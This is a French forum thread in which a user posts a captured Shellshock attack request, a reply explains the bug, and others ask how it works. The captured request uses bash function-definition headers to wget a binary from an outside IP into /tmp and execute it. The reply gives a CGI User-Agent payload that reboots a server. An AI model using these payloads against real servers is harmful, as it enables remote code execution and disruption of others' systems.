Résolu [BASH] Shellshock exploit ?

Statut
N'est pas ouverte pour d'autres réponses.

Switch.

Codeur Web à ton service | > Python
Premium
Inscription
13 Janvier 2013
Messages
2 956
Réactions
968
Points
6 491
RGCoins
25
Vous avez surement entendu parlé de la faille en bash qui va mettre internet a genoux ?

Un code realease sur Git

Code:
GET./.HTTP/1.0
.User-Agent:.Thanks-Rob
.Cookie:().{.:;.};.wget.-O./tmp/besh.http://162.253.66.76/nginx;.chmod.777./tmp/besh;./tmp/besh;
.Host:().{.:;.};.wget.-O./tmp/besh.http://162.253.66.76/nginx;.chmod.777./tmp/besh;./tmp/besh;
.Referer:().{.:;.};.wget.-O./tmp/besh.http://162.253.66.76/nginx;.chmod.777./tmp/besh;./tmp/besh;
.Accept:.*/*
$ file nginx
nginx: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.18, stripped
$ md5sum nginx
5924bcc045bb7039f55c6ce29234e29a nginx
$ sha256sum nginx
73b0d95541c84965fa42c3e257bb349957b3be626dec9d55efcc6ebcba6fa489 nginx
Looking at string variables, it appears to be a kernel exploit with a CnC component.
- found by @yinettesys

Si quelqu'un le comprend faite moi signe j'aimerais le comprendre, enjoy
 
Vous avez surement entendu parlé de la faille en bash qui va mettre internet a genoux ?

Un code realease sur Git

Code:
GET./.HTTP/1.0
.User-Agent:.Thanks-Rob
.Cookie:().{.:;.};.wget.-O./tmp/besh.http://162.253.66.76/nginx;.chmod.777./tmp/besh;./tmp/besh;
.Host:().{.:;.};.wget.-O./tmp/besh.http://162.253.66.76/nginx;.chmod.777./tmp/besh;./tmp/besh;
.Referer:().{.:;.};.wget.-O./tmp/besh.http://162.253.66.76/nginx;.chmod.777./tmp/besh;./tmp/besh;
.Accept:.*/*
$ file nginx
nginx: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.18, stripped
$ md5sum nginx
5924bcc045bb7039f55c6ce29234e29a nginx
$ sha256sum nginx
73b0d95541c84965fa42c3e257bb349957b3be626dec9d55efcc6ebcba6fa489 nginx
Looking at string variables, it appears to be a kernel exploit with a CnC component.
- found by @yinettesys

Si quelqu'un le comprend faite moi signe j'aimerais le comprendre, enjoy
Salut, c'est un exploit sur bash qui permet à l'assignation d'une variable de lancer des commandes à cause de la syntaxe.
Sur les serveurs web qui utilisent bash comme langage, l'user agent est stocké sous forme de variable dans le script bash.
Pour l'exploiter sur des sites, c'est ceux qui utilisent cgi donc avec une url du style xxx.fr/cgi-bin/ et il suffit d'envoyer un user agent sous la forme suivante () { :;}; /bin/bash -c reboot par exemple pour reboot le serveur. Si tu obtiens une erreur 500, alors cela à fonctionné.
 
Cette réponse a aidé l'auteur de cette discussion !
Salut,

Si tu as trouver ce code quelque part il explique son utilité et ces fonctions non ?

Bonne après-midi,
DEVR0 GTP
Je sais a quoi il sert mais je ne comprend pas son fonctionnement ^^

Bonne soirée,
Switch GTP
 
Salut, c'est un exploit sur bash qui permet à l'assignation d'une variable de lancer des commandes à cause de la syntaxe.
Sur les serveurs web qui utilisent bash comme langage, l'user agent est stocké sous forme de variable dans le script bash.
Pour l'exploiter sur des sites, c'est ceux qui utilisent cgi donc avec une url du style xxx.fr/cgi-bin/ et il suffit d'envoyer un user agent sous la forme suivante () { :;}; /bin/bash -c reboot par exemple pour reboot le serveur. Si tu obtiens une erreur 500, alors cela à fonctionné.
Merci beaucoup mais que signifie cette phrase ?

.wget.-O./tmp/besh.

wget c'est pour télécharger quelque chose surement dans le dossier /tmp/besh
c'est surement le site en question

mais nginx sert a quoi ?

chmod c'est les droits qu'on aura sur le serveur c'est ça ?
Bonne soirée,
Switch GTP
 
Merci beaucoup mais que signifie cette phrase ?

.wget.-O./tmp/besh.

wget c'est pour télécharger quelque chose surement dans le dossier /tmp/besh
c'est surement le site en question

mais nginx sert a quoi ?

chmod c'est les droits qu'on aura sur le serveur c'est ça ?
Bonne soirée,
Switch GTP

nginx et un serveur web ^^
 
Ton topic se trouvait dans la mauvaise section http://reality-gaming.fr/attachments/deplace-png.20318/, je l'ai donc déplacé dans la bonne section http://reality-gaming.fr/attachments/deplacement-png.20319/. :modo:
 
Statut
N'est pas ouverte pour d'autres réponses.
Retour
Haut